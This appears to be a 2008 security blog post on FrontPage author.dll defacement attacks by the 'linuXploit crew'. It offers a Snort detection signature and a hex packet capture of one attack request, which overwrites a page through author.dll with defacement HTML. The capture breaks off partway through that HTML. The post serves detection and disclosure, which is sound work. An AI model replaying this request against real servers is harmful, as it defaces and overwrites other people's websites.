Monday, September 8, 2008

LinuXploit Crew Frontpage author.dll core-project/1.0 attacks

Received some reports about widespread frontpage extension attacks (old but still working). Example of a hacked site

Here is a quick snort signature I whipped up for protection/detection and associated traffic (thanks Jack Pepper for tcpdump):

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"WEB linuXploit crew Frontpage access.dll attempt"; flow:established,to_server; content:"POST"; nocase; uricontent:"_vti_aut/"; nocase; uricontent:"author.dll"; nocase; content:"core-pro
ject"; nocase; reference:url,infosec20.blogspot.com; classtype:web-application-attack; sid:3001728; rev:2;)


The browser type is: core-project/1.0

0x0030: 0000 0000 504f 5354 202f 5f76 7469 5f62 ....POST./_vti_b
0x0040: 696e 2f5f 7674 695f 6175 742f 6175 7468 in/_vti_aut/auth
0x0050: 6f72 2e64 6c6c 2048 5454 502f 312e 310d or.dll.HTTP/1.1.
0x0060: 0a4d 494d 452d 5665 7273 696f 6e3a 2031 .MIME-Version:.1
0x0070: 2e30 0d0a 5573 6572 2d41 6765 6e74 3a20 .0..User-Agent:.
0x0080: 636f 7265 2d70 726f 6a65 6374 2f31 2e30 core-project/1.0
0x0090: 0d0a 486f 7374 3a20 7777 7777 2e61 6161 ..Host:.wwww.aaa
0x00a0: 6161 612e 6564 750d 0a41 6363 6570 743a aaa.edu..Accept:
0x00b0: 2061 7574 682f 7369 6369 6c79 0d0a 436f .auth/sicily..Co
0x00c0: 6e74 656e 742d 4c65 6e67 7468 3a20 3132 ntent-Length:.12
0x00d0: 3037 0d0a 436f 6e74 656e 742d 5479 7065 07..Content-Type
0x00e0: 3a20 6170 706c 6963 6174 696f 6e2f 782d :.application/x-
0x00f0: 7665 726d 6565 722d 7572 6c65 6e63 6f64 vermeer-urlencod
0x0100: 6564 0d0a 582d 5665 726d 6565 722d 436f ed..X-Vermeer-Co
0x0110: 6e74 656e 742d 5479 7065 3a20 6170 706c ntent-Type:.appl
0x0120: 6963 6174 696f 6e2f 782d 7665 726d 6565 ication/x-vermee
0x0130: 722d 7572 6c65 6e63 6f64 6564 0d0a 436f r-urlencoded..Co
0x0140: 6e6e 6563 7469 6f6e 3a20 636c 6f73 650d nnection:.close.
0x0150: 0a43 6163 6865 2d43 6f6e 7472 6f6c 3a20 .Cache-Control:.
0x0160: 6e6f 2d63 6163 6865 0d0a 0d0a 6d65 7468 no-cache....meth
0x0170: 6f64 3d70 7574 2b64 6f63 756d 656e 7425 od=put+document%
0x0180: 3361 3425 3265 3025 3265 3225 3265 3437 3a4%2e0%2e2%2e47
0x0190: 3135 2673 6572 7669 6365 2535 666e 616d 15&service%5fnam
0x01a0: 653d 2664 6f63 756d 656e 743d 2535 6264 e=&document=%5bd
0x01b0: 6f63 756d 656e 7425 3566 6e61 6d65 2533 ocument%5fname%3
0x01c0: 6469 2532 6568 746d 2533 626d 6574 6125 di%2ehtm%3bmeta%
0x01d0: 3566 696e 666f 2533 6425 3562 2535 6425 5finfo%3d%5b%5d%
0x01e0: 3564 2670 7574 2535 666f 7074 696f 6e3d 5d&put%5foption=
0x01f0: 6f76 6572 7772 6974 6526 636f 6d6d 656e overwrite&commen
0x0200: 743d 266b 6565 7025 3566 6368 6563 6b65 t=&keep%5fchecke
0x0210: 6425 3566 6f75 743d 6661 6c73 650a 3c68 d%5fout=false.h
0x0220: 746d 6c3e 0d0a 3c68 6561 643e 0d0a 3c74 tml..head..t
0x0230: 6974 6c65 3e6c 696e 7558 706c 6f69 745f itle linuXploit_
0x0240: 6372 6577 3c2f 7469 746c 653e 0d0a 3c6d crew /title..m
0x0250: 6574 6120 6874 7470 2d65 7175 6976 3d22 eta.http-equiv="
0x0260: 436f 6e74 656e 742d 5479 7065 2220 636f Content-Type".co
0x0270: 6e74 656e 743d 2274 6578 742f 6874 6d6c ntent="text/html
0x0280: 3b20 6368 6172 7365 743d 6973 6f2d 3838 ;.charset=iso-88
0x0290: 3539 2d31 223e 0d0a 3c2f 6865 6164 3e0d 59-1"../head.
0x02a0: 0a0d 0a3c 626f 6479 2062 6763 6f6c 6f72 ...body.bgcolor
0x02b0: 3d22 2346 4646 4646 4622 3e0d 0a3c 6469 ="#FFFFFF"..di
0x02c0: 7620 616c 6967 6e3d 2263 656e 7465 7222 v.align="center"
0x02d0: 3e0d 0a20 203c 703e 3c66 6f6e 7420 7369 ....pfont.si